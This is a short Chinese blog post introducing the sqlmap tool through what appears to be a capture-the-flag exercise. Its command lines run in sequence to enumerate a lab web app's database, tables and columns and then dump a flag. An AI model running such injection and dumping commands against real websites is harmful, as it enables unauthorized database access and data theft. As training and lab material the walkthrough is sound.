SQLmap初探

Sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供将恶意代码注入其中的选项

Sqlmap使用需要python2.6/2.7环境

Sqlmap主要用于访问数据库,编辑和删除数据,以及查看表格中的数据

现在我有一个地址:10.214.10.13:10002/?questionid=0,标准使用如下:

python sqlmap.py -u “http://10.214.10.13:10002/?questionid=0"

加上参数可以实现各种功能:

查看数据库:- - current - db
查看表:- - table
查看列:- - column
查看数据:- - dump

下面是完整的操作:

显示数据库:python sqlmap.py -u “http://10.214.10.13:10002/?questionid=0" –current-db

我们就得到了数据库:aaa_web2

查表:python sqlmap.py -u “http://10.214.10.13:10002/?questionid=0" -D aaa_web2 –table

接下来查看flag_is_here

查列:python sqlmap.py -u “http://10.214.10.13:10002/?questionid=0" -D aaa_web2 -T flag_is_here –column

最后直接读取flag即可

查看数据:python sqlmap.py -u “http://10.214.10.13:10002/?questionid=0" -D aaa_web2 -T flag_is_here -C flag –dump

这样flag就拿到了

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器